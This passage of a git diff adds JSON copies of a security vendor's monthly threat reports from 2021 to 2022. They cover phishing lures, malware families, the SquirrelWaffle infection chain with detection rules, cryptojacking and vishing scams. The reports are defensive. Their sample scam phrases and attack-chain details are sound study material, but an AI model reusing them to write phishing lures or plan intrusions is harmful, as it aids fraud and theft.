Fake credential harvesting login page posing as a Microsoft page (note the suspicious URL) Cryptocurrency scams Since the surge in popularity of cryptocurrency, we\u2019ve observed an influx of new phishing tactics as threat actors try to take advantage of the anonymity of cryptocurrency transactions to keep themselves from being traced. Since the start of the invasion of Ukraine, threat actors have specifically begun to impersonate legitimate aid organizations to exploit people\u2019s desire to support refugees and victims with donations. Phishing email soliciting cryptocurrency donations (note that the sender\u2019s email address doesn\u2019t align with the name, organization, or email provided in the email signature) Here are a few phrases we\u2019ve seen in phishing emails referencing Ukraine to target cryptocurrency: Email subject: \u201cHelp \u2013 Bitcoin\u201d \u201cPayment from your account\u201d \u201cHelp save children in ukraine\u201d \u201cCrypto \u2013 Account\u201d \u201cUkraine Donations\u201d Email body: \u201cHere is my BTC wallet\u201d \u201ctransfer bitcoins\u201d \u201cThis is my bitcoin id\u201d \u201cNow accepting cryptocurrency donation\u201d \u201cbelow is our wallet ID\u201d Given threat actors\u2019 horrible appropriation of this conflict for malicious means and personal gain, those looking to provide financial support to victims of the invasion of Ukraine should confirm the legitimacy of any donation-related communications before providing financial information. For example, recipients should inspect the sender\u2019s email address, search the organization online to confirm key contact details, and hover over any buttons/URLs in the email to inspect the redirect path without clicking it. Phishing resilience recommendations: Conduct regular security awareness training for employees, including phishing simulations. Don\u2019t click any links in a suspicious email. Double check the sender\u2019s address and return path in suspicious emails. Use open source tools to verify details for external senders and organizations. Use a verified internal channel (for example, an email to a verified third-party vendor or a message on your company\u2019s internal messaging platform) to confirm if the communication/request in a suspicious email is legitimate and expected. Block access to malicious websites. Remove the email from a user\u2019s inbox if it\u2019s determined to be a phishing attempt. Takeaways In February 2022, we observed several threat vectors and tactics discussed in our previous reports making a strong reappearance, including: Removable media Use of valid credentials for cloud identity providers Public-facing exploitation of Log4j Cryptojacking Phishing with credential harvesters An important step to protect against many of the above: deploy phish-resistant MFA (FIDO security keys) everywhere you can. This is particularly important to make sure threat actors don\u2019t gain access to your SSO tools and all of the sensitive apps and data they provide access to. While only involved in one incident we investigated in February, it was telling to see the Log4j vulnerability continuing to be exploited against public-facing systems. This vulnerability will remain relevant and should be examined during any vulnerability scans conducted in and against your digital environment. In terms of malware, AsyncRAT made up 15 percent of identified malware payloads from incidents we detected and responded to in February 2022. This open source remote administration tool was initially deployed using an ISO file and used a number of stages to eventually inject its final payload into the memory of a legitimate process. And let\u2019s not forget: removable media remained an important attack vector in February and threat actors continued to use unauthorized system access to deploy crypto mining software. The takeaway: attackers will return to the vectors and tactics they know work, even as new ones emerge. Phishing remained in the top spot for infection vectors in February. Two key trends stood out: first, threat actors using the ability to register an adobe.com subdomain through Adobe Campaign to give their emails a sense of legitimacy. Attackers hope the association with adobe.com will make their victims more likely to click links in the email and follow through on downloading malicious files or entering credentials. Users should check sender addresses and URL pathways (without clicking) and check with colleagues through verified channels if they\u2019re expecting to collaborate on Adobe-based projects. When in doubt, it\u2019s always better to forward potential phishing emails to your security team for investigation. The other phishing trend we observed involved cryptocurrency \u2014 specifically, threat actors requesting crypto transfers by pretending to solicit donations related to the war in Ukraine. While Ukraine has legitimately raised $35 million in cryptocurrency donations , threat actors are trying to take advantage of the crisis for personal financial gain. The verified crypto wallet addresses for donations to Ukraine can be found on the country\u2019s official Twitter account . Details for other organizations should be confirmed through verified external sources before any financial information is provided. We\u2019ll be back with more attack vectors insights and threat data \u2014 but we\u2019re changing things up! Our threat reports are going quarterly so we can provide more data on what we\u2019re seeing, highlight detection opportunities, and dive further into resilience recommendations that can protect your org. Expect to see our first quarterly threat report in May. If you read our Great eXpeltations annual report , that\u2019s a hint of what\u2019s coming your way! In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note , we\u2019re happy to chat." +} \ No newline at end of file diff --git a/top-attack-vectors-january-2022.json b/top-attack-vectors-january-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..afeaf22a7b74857441c4abc1a3df303f4631cb9e --- /dev/null +++ b/top-attack-vectors-january-2022.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: January 2022", + "url": "https://expel.com/blog/top-attack-vectors-january-2022/", + "date": "Feb 17, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: January 2022 Security operations \u00b7 6 MIN READ \u00b7 BRITTON MANAHAN, SIMON WONG AND HIRANYA MIR \u00b7 FEB 17, 2022 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our security operations center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in January 2022 to determine the top attack vectors used by threat actors. Here\u2019s what stood out this month: USB flash drives continuing to pose a malware threat Threat actors taking advantage of the wide range of malware at their disposal Phishing attempts using fake antivirus invoices and CEO impersonation Keep reading for details and our tips for what to do about all the above. Removable media remains a threat TL;DR: Removable media, in particular USB-based storage devices, are still a relevant threat to your environment. In January 2022, removable media were responsible for nine percent of all incidents we responded to. That increases to 20 percent for incidents where the initial infection vector involved a physical endpoint (in other words, removing incidents involving a cloud-based service). While security awareness training has focused on USB devices for years and some orgs require approval per-device before connecting them to a company-owned asset, these devices continue to be used in business environments because of their convenience. And usage doesn\u2019t just apply to known and trusted USB devices. In fact, a 2016 study examining what people would do if they found a USB in a parking lot showed that nearly 50 percent of people would plug an unknown USB device into their computer. While human curiosity and impulse is likely just as high in 2022, maybe we can hope the rise of remote work has made the discovery of office parking lot USBs less likely? With that said, even trusted USB devices are often infected with malware variants that search for external storage devices connected to a victim host to infect them and spread further. This risk is much greater for endpoint users who can transfer USB devices from personal devices to business assets. In January 2022 alone, we saw the AsyncRat, Valyrian, Gamarue, Agent Tesla, and Forbix malware families attempt to spread through USB storage devices. We also saw additional generic malicious worms including one deployed as a hidden VBScript script file on the device. It\u2019s highly likely that these malware variants would have tried to infect any other external USB storage devices attached to these systems had they achieved their initial infection without detection. Resilience recommendations: Consider blocking external USB storage devices by default in your environment, with approval required for use. Make sure your security awareness training includes sections on the dangers of external USB storage devices. If supported, have your antivirus software or endpoint detection and response (EDR) tech scan any externally-connected USB storage devices. If possible, disable the AutoRun feature for USB flash drives in Windows-based operating systems. The AutoRun feature allows staged malware on USB devices to execute without additional interaction as soon as the device is plugged in. A variety of variants TL;DR: Threat actors are deploying a wide range of malware variants, frequently with the common goal of achieving remote system access. In January 2022, no single malware variant dominated the landscape of identified payloads among incidents we responded to. Here\u2019s a list of malware variants we identified, with no variant making up more than 15 percent of the total: Agent Tesla AsyncRAT ChromeLoader Conflicker CryptoWall Forbix Gamarue Gootkit Gozi Socgholish Valyrian In addition to these malware families, we also observed: A generic VBScript and PowerShell-based script used for command and control that we weren\u2019t able to attribute to a particular malware family. A legitimate crypto miner deployed for cryptojacking. Legitimate remote access software deployed for remote interactive desktop access. Two instances of a malicious Chrome extension (ChromeLoader) being installed. A ransomware sample. This wide variety of malware and payloads demonstrates the abundance of malicious software and tooling at threat actors\u2019 disposal. The continual economic incentives of cybercrime guarantee that malware families and their variants will continue to evolve. Most of the malware samples listed above established a connection to a remote command and channel, though they took different obfuscated paths and stages to reach that point in their execution. Regarding initial infection vectors, we also observed a variety of techniques to deploy these malware variants, including: Removable media Web delivery JavaScript file Phishing Macro-enabled Microsoft Office doc To sum it up: the info in this section shows that defenders need to make sure they don\u2019t hyperfocus on any particular malware variant or specific tool or technique used by threat actors, but rather focus on a layered approach to security that can detect and prevent the varied and continually evolving malware landscape. Regarding identification of samples you may encounter, open source intelligence (OSINT) tools for malware are a great way to identify a malware family without needing a full-time malware reverse engineer on your staff. Resilience recommendations: Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Implement layered security controls across your environment to detect and prevent evolving threats. Perform a penetration test against your environment to evaluate your current security posture. Subscribe to OSINT feeds to stay up-to-date on malware trends and leverage this intelligence in your deployed security tech. Phishing TL;DR: We saw an increase in fake Norton invoices and CEO impersonations emails in January 2022. We reviewed over five thousand potentially malicious email submissions in January 2022, and identified two phishing trends using the following techniques: Fake Norton invoices We noticed an increase in the number of emails containing bogus Norton invoices for Norton Antivirus software purchases. The invoices generally include a phone number to call if you have questions about your recent transaction. These emails usually come from spoofed sender addresses that appear as if they\u2019re from Norton Security or other legitimate businesses that sell Norton Security products, like GeekSquad. We\u2019ve also seen threat actors use the QuickBooks platform to give the email legitimacy. Threat actors aim to persuade recipients to call the phone number provided, then plan to scam victims out of money by requesting a payment method for the invoiced amount. They also may try to make recipients install third party remote tools that grant access to their computers. Fake Norton invoice using QuickBooks platform CEO impersonation Because info about CEOs is usually widely available online, CEO impersonation is a common occurrence and effective tactic for attackers. Most CEO impersonation email submissions convey a sense of urgency in the email\u2019s body and subject. Here are a few phrases that we\u2019ve come across: Email subject: \u201cURGENT\u201d \u201cConfidential\u201d \u201cavailable ?\u201d \u201cQuick Response\u201d Email body: \u201cDo you have some spare time to handle a quick task?\u201d \u201cEmail me on here once you get this\u201d \u201cI need a task done ASAP and look forward to my text\u201d \u201cYour immediate response will be highly appreciated\u201d Impersonation emails also tend to spoof an external account to make it seem like the email is coming from the organization\u2019s CEO. Attackers then often like to move the conversation away from email to lower the chance of being discovered. Asking for cell phone numbers allows them to use calls or texting for further interactions. Threat actors will usually ask victims to purchase gift cards and send pictures of the redemption codes. Resilience recommendations Conduct regular security awareness training for employees, including phishing simulations. Don\u2019t click on any links in a potentially suspicious email. Double check the sender\u2019s address and return path for suspicious emails. Use open source tools to verify if a provided phone number is actually associated with the supposed sender. Block access to malicious websites. Use a verified internal channel (for example, a phone call to a verified company phone number or a message on your company\u2019s internal messaging platform) to confirm if the communication/request in the email is legitimate and expected. Remove the email from a user\u2019s inbox if it\u2019s determined to be a phishing attempt. Takeaways Phishing remained in the top spot for infection vectors in January, but we also saw a wide variety of malware and an old friend \u2013 the USB flash drive threat \u2013 make a return. While many of us may assume the days of bumping into a random flash drive in the office parking lot are over, these devices remain a target for threat actors. It\u2019s important to remember that USB devices allow threat actors to use a variety of malware families to gain access to additional systems. Many malware variants can continually search an infected system for connected external USB storage devices and infect them, as well. Companies should have security controls in place to block endpoint users from inserting USB flash drives previously connected to personal assets into company assets, and only allow approved storage devices for company assets. Speaking of malware, we also saw a range of malware families this month, identifying 11 families across payloads for incidents we responded to. And no single family made up more than 15 percent of the total number of malware samples. We also identified a malicious Chrome browser extension and artifacts from a ransomware sample. With such a variety of tools at their disposal, attackers are clearly deploying a variety of tactics to achieve their goals. While these malware families used different obfuscation and payload stages, the most common end goal was establishing a command and control network communication channel back to the attacker. Companies should make sure that they have complete coverage of their endpoint security controls across all of their devices, and consider subscribing to OSINT malware feeds. Phishing remains as effective of a tactic as ever, with two particularly notable trends in January. Threat actors are sending convincing Norton Antivirus invoices to trick users into paying them. This social engineering scheme continues over the phone after users who received the email call the number provided, when threat actors will typically request payment information. Threat actors are also sending fake emails appearing to come from a company\u2019s CEO. These emails rely on urgency to hopefully prevent targeted employees from taking the time to verify features of the email that would point out it isn\u2019t legit. It\u2019s essential to regularly conduct security awareness training for employees to help them identify indicators of a phishing attempt. We\u2019ll be back with insights on February\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-july-2021.json b/top-attack-vectors-july-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..1384e53263b6a41e14fbd47f37f038f52ebd8423 --- /dev/null +++ b/top-attack-vectors-july-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: July 2021", + "url": "https://expel.com/blog/top-attack-vectors-july-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: July 2021 Security operations \u00b7 5 MIN READ \u00b7 JON HENCINSKI \u00b7 AUG 13, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into security strategy for your org. For this report, our SOC analyzed the incidents we investigated in July 2021 to determine the top attack vectors used by bad actors that month. We\u2019ll dive into the trends we\u2019re seeing in two important arenas: phishing and malware. Phishing Business Email Compromise (BEC) in O365 is still public enemy number one. TL;DR: BEC attempts in Microsoft Office 365 (O365) launched from phishing emails were the top threat in July. Follow @jhencinski Nearly 65 percent of incidents we identified were BEC attempts in O365 \u2013 up slightly from June, when BEC attempts in O365 accounted for 53 percent of incidents we identified. Threat actors behind these campaigns create phishing emails with links to credential harvesting sites impersonating webmail login portals. After the victim enters their credentials, the threat actor can use these credentials to access the victim\u2019s email \u2014 potentially opening a treasure trove of sensitive information. Of note, we didn\u2019t identify a BEC attempt in Google Workspace in July. While Google\u2019s Workspace security settings are pretty straightforward and proficient out-of-the-box, O365 has some initial configurations that must be changed by default to improve security (listed below), otherwise leaving opportunities in play for bad actors. We expect the trend of O365 BEC attempts to continue and we\u2019re monitoring Microsoft\u2019s plan to do away with Basic Authentication by the end of 2021. Resilience recommendations: Ensure that you\u2019re enabling MFA wherever possible Disable legacy protocols like IMAP and POP3 Implement extra layers of conditional access for your riskier user base and high-risk applications Consider Azure Identity Protection or Microsoft Cloud App Security (MCAS) BEC isn\u2019t just about access to email. Protect your cloud identity providers too! We\u2019re seeing an increase in the number of attacks targeting cloud access identity providers this year. By attacking these providers, threat actors gain access to SSO credentials and, through them, application data. Nearly 100 percent of the attacks on cloud identity providers we identified in July targeted Okta credentials , a popular SSO technology. Resilience recommendations: Phish resistant MFA (fido/webauthn) Enforce MFA prompts when users connect to sensitive apps via app-level MFA Customize your Okta sign-in page appearances Watch out for voice-phishing, aka \u201cvishing\u201d, attacks. In July, our SOC responded to a remote access scam incident where an employee received a phone call from a scammer pretending to be from the org\u2019s help desk. The employee was instructed to download and install software that allowed the scammer to access and remotely control the employee\u2019s desktop computer. At this point, the employee sensed something was amiss, hung up the phone and contacted their security team directly (good call!). We typically spot these attacks by monitoring for the installation of remote access software that\u2019s atypical for an org. In these scenarios, the scammer is after credit card information. They typically have the victim deploy legitimate remote access software, then take control of the victim\u2019s computer and give the appearance that their machine is \u201cinfected\u201d with \u201cviruses.\u201d At that point, they ask for the victim\u2019s credit card information to \u201cclean up\u201d and repair their machine. Microsoft recently posted a blog describing a recent ransomware attack that used vishing to gain initial entry. Resilience recommendations: Block installation of remote access software that\u2019s not approved using A/V or EDR. Be suspicious of any phone calls received directly from someone claiming to be from your IT Help Desk. It\u2019s totally okay to call them back to verify if it\u2019s legitimate, but make sure to use the help desk numbers provided by your company and not the caller. If you notice something suspicious, contact your IT Help Desk or security team. Malware Bad actors continue to favor user execution > exploitation TL;DR: You\u2019re far more likely to experience an incident from an employee unintentionally self-installing malware or running an evil macro than from an unpatched vulnerability. Deployment of widely distributed commodity malware on Windows-based computers accounted for 17 percent of incidents that we responded to in July. Commodity malware includes \u201cdroppers,\u201d programs to steal employee information, coin miners and banking Trojans. Only one opportunistic malware incident in July was the result of a software vulnerability. The rest? Techniques that required user execution. Examples: Zipped JScript files, Zipped Windows Executables and Microsoft macro-enabled Word documents. These aren\u2019t exploits. This is \u201cfeature\u201d abuse. While we certainly recommend staying up-to-date with the latest OS and software updates, orgs need to evaluate and control the \u201cdouble click\u201d attack surface. It\u2019s worth noting that we didn\u2019t identify an incident where malware was deployed to a Google Chromebook or macOS-based computer in July. All of the commodity malware incidents we identified in July involved a Windows-based computer. We fully expect the trend of threat actors favoring user execution over exploitation to continue. Resilience recommendations: We know disabling Office macros isn\u2019t easy, but it\u2019s worth exploring given their tendency to be exploited Consider associating WSH files with Notepad to mitigate common remote code execution techniques Disable Excel 4.0 macros WordPress security and its ecosystem have improved over the years, but it\u2019s still an attack vector. In July, our SOC stopped a ransomware attack at a large software and staffing company. The attackers compromised the company\u2019s WordPress CMS and used the SocGholish framework to trigger a drive-by download of a Remote Access Tool (RAT) disguised as a Google Chrome update. In total, four hosts downloaded a malicious Zipped JScript file that was configured to deploy a RAT, but we stopped the attack before ransomware deployment and helped the organization remediate its WordPress CMS. Keep up to date on patches, but also consider the resilience recommendations below. Resilience recommendations: Run trusted and well-known WordPress plugins Follow a WordPress hardening guide or install a WordPress security plug-in Explore implementing or updating your website Content Security Policy to block malicious scripts MFA everything and all users Lock down your dev and staging instances, too (including adding MFA) Run an IR tabletop exercise where the initial entry point is your WordPress site Takeaways The wave of ransomware news this summer and the growing trend of bad actors deploying malware using techniques that require user execution highlights the need for orgs to guard themselves against future ransomware incidents (see our recommendations here ). That being said, phishing (and particularly BEC through O365) was by far the most frequent threat we investigated in July, and we expect it to remain that way. Preventing BEC and credential harvesting through phishing and \u201cvishing\u201d should be a priority for resilience efforts. Orgs should stay up-to-date on the latest phishing trends to update their policies and educate their employees when new tactics are at play. And our top recommendation to protect against BEC in O365 and account takeover? MFA, MFA, MFA. Then consider taking some of the additional resilience actions we\u2019ve discussed, like disabling legacy protocols, adding extra layers of conditional access and deploying additional security tools like Azure Identity Protection and MCAS. We\u2019ll be back with insights on August\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-november-2021.json b/top-attack-vectors-november-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..5300fa2d01acfee0b52c67ee19ea0ff490075e1f --- /dev/null +++ b/top-attack-vectors-november-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: November 2021", + "url": "https://expel.com/blog/top-attack-vectors-november-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: November 2021 Security operations \u00b7 7 MIN READ \u00b7 KYLE PELLETT \u00b7 DEC 14, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in November 2021 to determine the top attack vectors used by bad actors. Here\u2019s what\u2019s ahead: A rise in phishing emails linking to malicious macro-enabled Microsoft Office docs, ultimately targeting financial accounts A breakdown of cryptojacking and the latest tactics we\u2019re seeing What to do about all the above Evil macros used to deploy SquirrelWaffle TL;DR: 25 percent of the commodity malware incidents we investigated in November were attempts to deploy SquirrelWaffle. In November, we observed a 10 percent increase in commodity malware incidents resulting from phishing emails containing links to download malicious macro-enabled Microsoft Office or Excel documents. We attributed most of this activity to SquirrelWaffle, a malware loader. One in four commodity malware incidents were attempts to deploy this family of malware. This is a substantial increase from previous months and we expect this trend to continue. A typical attack chain to deploy SquirrelWaffle looks like the following: An employee receives a phishing email containing a seemingly innocuous link and an urgent call to action If the employee clicks the link, they receive a ZIP file with an embedded macro-enabled Office or Excel document The document instructs the employee to enable macros (red flag!) If the employee enables macros, this initiates the SquirrelWaffle infection process SquirrelWaffle is then typically used to deploy additional malware to an infected host To date, we\u2019ve seen that SquirrelWaffle often downloads a variant of the Qakbot banking trojan to scrape the victim\u2019s machine for sensitive financial data and send it back to the attackers. SquirrelWaffle can also load more insidious malware like CobaltStrike\u2019s Beacon agent, a post-exploitation attack emulation tool that\u2019s popular among cybercrime and ransomware groups. Notable: We integrate with many Endpoint Detection and Response (EDR) technologies and have identified a trend where SquirrelWaffle executes at least partially, regardless of the EDR in use. Here\u2019s an example. In a recent investigation involving a Windows 10 host with an EDR agent, an employee downloaded a malicious ZIP file with an embedded Office document and then enabled macros. This kicked off the SquirrelWaffle infection process. The evil macro was configured to download and execute evil Windows DLL files on the infected host. Shortly after, we detected process activity on the infected host consistent with reconnaissance. At this point in the attack, the EDR agent terminated the evil process. Here\u2019s what that looks like from a defender\u2019s perspective: Endgame process tree view of SquirrelWaffle resulting in second stage payload execution. What\u2019s the goal here? In most cases, the goal is to scrape the infected host for credentials, including financial account information. When a host is infected, attackers gain access to that victim\u2019s contact list and can use their compromised accounts to play on trust between the account owner and their contacts to enable further infections. How to detect SquirrelWaffle: Alert when you see an Excel process spawn Regsvr32.exe to load DLL files in C:Datop For a broader approach, alert when you see an Excel process spawn Regsvr32.exe Alert when you see Regsvr32.exe execute with references to .good or .text files within the process arguments Alert when you see Microsoft Remote Assistance (msra.exe) spawn process typically associated with recon (whoami.exe, arp.exe) and its parent process is Regsvr32.exe Here\u2019s an example of a SquirrelWaffle alert in the Expel Workbench\u2122: Expel Workbench\u2122 process tree lineage of SquirrelWaffle: Outlook -> Excel -> Regsvr32 Resilience recommendations: Block Microsoft Office macros and Excel 4.0 macros as they\u2019re a popular target to exploit with malware. While macros may offer some productivity improvements, if you can live without them, it\u2019s best to disable them entirely. We know it\u2019s a tall order, but spend time educating your users on how to spot phishing emails and suspicious links or attachments. Various exploits used to deploy coin miners TL;DR: Routes of infection vary, but attackers\u2019 end goal remains the same: deploying crypto mining software. We\u2019ve now brought up cryptojacking in a few of these reports. So you may be asking yourself, \u201cwhat is cryptojacking and why should I care?\u201d That\u2019s a totally fair question. The quick answer is that attackers want to use other people\u2019s computing resources to do computational work to earn cryptocurrency and profit. Crypto mining generally isn\u2019t profitable when you factor in operational costs \u2013 it requires tons of energy and resources to earn cryptocurrency this way. But if attackers can cut costs by using other people\u2019s resources (electricity, internet and primarily processing power), it can become profitable. Consider this metaphor \u2013 you\u2019re a hard working gold panner in your local creek. You\u2019ve been panning for gold for a year now and some days you\u2019re able to find a nugget and pay your bills for the month, but on average, you don\u2019t break even. In fact, you\u2019re losing money gambling on your luck, which is also dependent on how many hours you put into the actual work of wading into the water and sifting through rocks and sand. But what if you could convince your neighbors to also spend their days panning for gold in their creeks and send you the nuggets? Your problem would be solved! Except that no one would actually do that since there\u2019s nothing in it for them. Which is what cryptojacking boils down to \u2013 taking advantage of other people\u2019s resources without their permission so you profit. So how does this happen in a digital world? Primarily by taking advantage of vulnerable servers on cloud infrastructure. We\u2019re typically alerted to a cryptojacking operation by an alert for network traffic patterns that we know resemble crypto mining. We\u2019ll see lots of outbound traffic to a miner pool, which is essentially the digital river from our metaphor where people send their cryptographic hashes and try to get a reward. Our investigations typically lead us back to an exploited vulnerability on a public-facing web server. Here are some of the specific tactics we\u2019ve seen recently: Public Amazon S3 buckets are a necessary storage option used regularly by AWS cloud customers. This also makes them a popular target for attackers. Bad actors scan the contents of these buckets for valuable access keys and other identifiable information that shouldn\u2019t be public. These data leaks can occur if proper S3 bucket access controls aren\u2019t implemented. In one instance, attackers gained access to AWS through credentials that were mistakenly made publicly available. The first thing the attackers did was run new EC2 instances (virtual servers hosted on AWS) in our customer\u2019s AWS environment and begin crypto mining. Notably, they didn\u2019t attempt any other exploitation \u2013 we suspect they didn\u2019t want to set off alarms, so took the shortest path to begin crypto mining as quietly as possible. Going unnoticed while their operations run is the ideal scenario for cryptojacking attackers. So what coin miners do we typically see? A lot of XMRig to mine Monero. But on rare occasions, we see a coin miner deployed alongside advanced malware that not only mines coins but also steals access keys and spreads within an organization\u2019s cloud environment. In November, we observed the crypto mining TNT Worm (which is also able to steal AWS access keys) on a customer\u2019s demo EC2 instance within minutes of being turned on. We suspect this EC2 instance was compromised because it hadn\u2019t been regularly updated since it was for demo purposes and wasn\u2019t frequently active. This worm has remained prevalent, consistently taking advantage of misconfigured systems. The worm also has an interesting greedy characteristic \u2013 it attempts to identify if there are any other miners running on the infected hosts and disables any that are to ensure processing power and mining capabilities are dedicated to its mining operation. The TNT Worm is configured to spread itself by scanning for additional misconfigured Docker platforms and Kubernetes systems. In this incident, we identified the worm and provided remediation steps to our customer in seven minutes after evidence of crypto mining was identified. Our investigation didn\u2019t find evidence of AWS access key exposure. We suspect the TNT Worm prioritizes getting mining operations up and running before downloading additional scripts that attempt to propagate in the environment through AWS access keys. With regard to another crypto jacking infection pathway, this month also showed us that poisoning npm packages wasn\u2019t a one hit wonder. Last month , we discussed hijacked ua-parser and rc packages used to deploy crypto mining software. This month, we saw the popular coa package causing trouble for a few of our customers. Resilience recommendations: Regularly check and update outdated software on public-facing servers and maintain a consistent update regimen to keep up with newly discovered vulnerabilities. Follow security news and subscribe to threat intelligence feeds about current and past exploits to stay up-to-date on the latest targets. Implement network layer controls to detect and block network communications to cryptocurrency mining pools. Have computing resource alarms forwarded to your SIEM to alert your team of overtaxed resources deployed for cryptojacking. Implement access controls for Amazon S3 buckets. Scan and identify public-facing assets using Shodan . Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Takeaways One of the most notable trends our team detected this month was a 10 percent increase in commodity malware incidents resulting from phishing emails containing links to download malicious macro-enabled Microsoft Office and Excel documents \u2013 in most cases, SquirrelWaffle. If not detected and stopped, SquirrelWaffle typically downloads a banking trojan onto victims\u2019 machines to compromise their financial accounts. Our top tip to combat this trend: disable Microsoft Office macros and Excel 4.0 macros since they\u2019re such a popular target to exploit with malware. Then, spend time educating your users on how to spot and report phishing emails and suspicious links or attachments so they\u2019re less inclined to click when that malicious scam comes through. And in case a user does fall for the phishing campaign, deploying SquirrelWaffle into your environment, consider the detection opportunities discussed above to catch it in its tracks. Another key trend we\u2019ve mentioned before is that malicious cryptocurrency activity is on the rise this year. Attackers are using different methods of infection, but share the same end goal \u2013 cryptojacking, or using their victims\u2019 computing resources to run crypto mining software. To keep miners out of your environment, make sure to keep your software up-to-date on public-facing servers and keep an eye out for newly discovered vulnerabilities. Also make sure to follow proper endpoint guidance, including EDR and patching. Additionally, tools that alert your operations team of overtaxed resources can also help your security team by indicating resources deployed for cryptojacking. We\u2019ll be back with insights on December\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-october-2021.json b/top-attack-vectors-october-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..33274a55c710497ff8ea56a4f4429779159e4fc2 --- /dev/null +++ b/top-attack-vectors-october-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: October 2021", + "url": "https://expel.com/blog/top-attack-vectors-october-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: October 2021 Security operations \u00b7 6 MIN READ \u00b7 BRITTON MANAHAN \u00b7 NOV 10, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in October 2021 to determine the top attack vectors used by bad actors. In a month where we saw a wide variety of initial attack vectors, here\u2019s what stood out: Voice phishing (vishing) to convince end users to install remote access software Cybercriminals continuing to target cryptocurrency A phishing incident highlighting how social engineering remains so effective for attackers Read on to learn more and see our tips for what to do about all of the above. Voice phishing to deploy remote access software TL;DR: Bad actors are deploying legitimate remote access software to gain interactive access to endpoints. In October, around three percent of the incidents we investigated involved bad actors using social engineering to manipulate end users into installing legitimate remote access software, hoping to gain an entry point. By \u201clegitimate,\u201d we mean software that isn\u2019t inherently malicious but has functionality that bad actors can deploy for malicious purposes. Though not yet an alarming presence, we didn\u2019t see any incidents of this type in September, so we\u2019re keeping an eye out for a potential trend. October\u2019s incidents featured several interesting details. They each involved a Windows endpoint, which had the Remote Desktop application built-in. And rather than trying to enable or re-configure the built-in app on the Windows endpoint, the bad actors tried to install alternative remote access software, likely to bypass any security controls implemented at the network level. Since the built-in Windows Remote Desktop application is such a well-known potential entry point for attackers, companies often have multiple security controls in place to prevent opening it up to external connections. For example, external outbound connections over port 3389, the port used by Windows Remote Desktop, are often blocked by perimeter network firewalls. Interestingly, both of these incidents also involved vishing (voice phishing), where bad actors posing as tech support spoke to end users over the phone and instructed them to download and install the remote access software. The remote access software used in these incidents included Screen Connect, AnyDesk and TeamViewer. Based on our investigations, it doesn\u2019t appear the attackers were focused on lateral movement or a larger network compromise, but rather on the individual endpoints they gained access to. This aligns with a conventional Windows Tech Support scam, where scammers target random phone numbers and act as tech support services to try to make end users install a remote access application. Once these attackers gain access to a system, they\u2019ve primarily searched common folder locations for sensitive information or for active banking sessions in the user\u2019s web browsers. Resilience recommendations: Conduct regular security awareness training for your employees, including vishing and verifying calls or download requests supposedly from company IT/tech support. Consider restricting the ability to install non-allowlisted applications in your environment through an endpoint detection and response (EDR) tool or built-in tools like Microsoft Applocker . Assess your asset inventory management to make sure all of your endpoints are accounted for and in compliance with your security standards. Cybercriminals remain interested in cryptocurrency TL;DR: We continued to observe a rise in malicious activity related to cryptocurrency in October using multiple initial infection vectors. In October, half of the incident payloads we identified were found to be crypto mining software, up 11 percent from the previous month. This continued increase in malicious crypto mining activity overlaps with the global cryptocurrency market cap setting a new record of 2.7 trillion . In addition to exploiting public-facing vulnerabilities, bad actors also deployed crypto mining software as a web download and even a hijacked npm package. The hijacked npm package resulted from the compromise of a developer npm account for a popular JavaScript library, with this access then used to modify the library. This attack was particularly concerning because it impacted a popular and trusted programming library that was frequently downloaded during routine build and deployment processes for applications. This type of attack is also a prime example of why layered security is so essential for cybersecurity defense. Bad actors continue to find creative ways to deliver payloads \u2014 however, in this incident, the EDR tool deployed on the endpoint quickly alerted us about the resulting mining activity after the initial compromise. The increased monetary value of cryptocurrency is fueling not only this cryptojacking trend ( which we also discussed in September ), but also the trend of targeting crypto wallets . In fact, 25 percent of the malware payloads we identified in October had the ability to locate and extract information about cryptocurrency wallets. This means a grand total of 75 percent of October\u2019s identified payloads had capabilities for generating or stealing cryptocurrency. While crypto-focused attackers have included checks for popular cryptocurrency wallets (like Metamask) in their malware for a long time, 